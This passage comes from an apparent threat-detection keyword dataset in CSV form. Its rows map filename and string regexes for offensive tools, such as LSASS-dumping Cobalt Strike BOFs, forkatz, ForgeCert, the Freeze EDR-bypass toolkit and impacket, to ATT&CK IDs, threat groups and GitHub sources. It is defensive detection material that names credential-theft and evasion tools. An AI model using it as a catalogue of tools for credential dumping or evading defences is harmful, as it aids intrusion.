T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.c*",".{0,1000}foreign_lsass\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x64*",".{0,1000}foreign_lsass\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass.x86*",".{0,1000}foreign_lsass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*forge_ticket.rb*",".{0,1000}forge_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*forge_ticket_spec.rb*",".{0,1000}forge_ticket_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ForgeCert.exe*",".{0,1000}ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ForgeCert-main*",".{0,1000}ForgeCert\-main.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*Forging a token from a fake Network Authentication through Datagram Contexts*",".{0,1000}Forging\sa\stoken\sfrom\sa\sfake\sNetwork\sAuthentication\sthrough\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*forkatz.exe*",".{0,1000}forkatz\.exe.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" 
"*forkatz.sln*",".{0,1000}forkatz\.sln.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz.vcxproj*",".{0,1000}forkatz\.vcxproj.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*forkatz-main*",".{0,1000}forkatz\-main.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*ForkDump-x64.exe*",".{0,1000}ForkDump\-x64\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x64.pdb*",".{0,1000}ForkDump\-x64\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x86.exe*",".{0,1000}ForkDump\-x86\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkDump-x86.pdb*",".{0,1000}ForkDump\-x86\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*ForkPlayground-master*",".{0,1000}ForkPlayground\-master.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*Format SSSD Raw Kerberos Payloads into CCACHE files.*",".{0,1000}Format\sSSSD\sRaw\sKerberos\sPayloads\sinto\sCCACHE\sfiles\..{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*-format=dotnet-createsection -sleep*",".{0,1000}\-format\=dotnet\-createsection\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*--format-string ziiiiizzzb * ",".{0,1000}\-\-format\-string\sziiiiizzzb\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*--format-string ziiiiizzzib *",".{0,1000}\-\-format\-string\sziiiiizzzib\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*fortalice/bofhound*",".{0,1000}fortalice\/bofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*fortra/impacket*",".{0,1000}fortra\/impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*fortra/No-Consolation*",".{0,1000}fortra\/No\-Consolation.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*FortyNorthSecurity*",".{0,1000}FortyNorthSecurity.{0,1000}","offensive_tool_keyword","Github Username","FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. 
and more","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/FortyNorthSecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*FortyNorthSecurity/CIMplant*",".{0,1000}FortyNorthSecurity\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*FortyNorthSecurity/FunctionalC2*",".{0,1000}FortyNorthSecurity\/FunctionalC2.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*found-passwords.txt*",".{0,1000}found\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*FourEye(shellcode_bypass*",".{0,1000}FourEye\(shellcode_bypass.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*FourEye-main*",".{0,1000}FourEye\-main.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*fox-it/adconnectdump*",".{0,1000}fox\-it\/adconnectdump.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*fox-it/BloodHound*",".{0,1000}fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*foxlox/hypobrychium*",".{0,1000}foxlox\/hypobrychium.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*fpc -c Seatbelt*",".{0,1000}fpc\s\-c\sSeatbelt.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 
"*FrameManagementAssociationRequest.py*",".{0,1000}FrameManagementAssociationRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementDeauthentication.py*",".{0,1000}FrameManagementDeauthentication\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementProbeRequest.py*",".{0,1000}FrameManagementProbeRequest\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*FrameManagementReassociationResponse.py*",".{0,1000}FrameManagementReassociationResponse\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*framework/obfuscation/*",".{0,1000}framework\/obfuscation\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Framework-MobSF*",".{0,1000}Framework\-MobSF.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","16345","3116","2024-04-14T13:09:49Z","2015-01-31T04:36:01Z" "*frampton.py*",".{0,1000}frampton\.py.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*freenas_reverse_root_shell_csrf*",".{0,1000}freenas_reverse_root_shell_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Freeze_*_darwin_amd64*",".{0,1000}Freeze_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*Freeze_*_linux_amd64*",".{0,1000}Freeze_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" 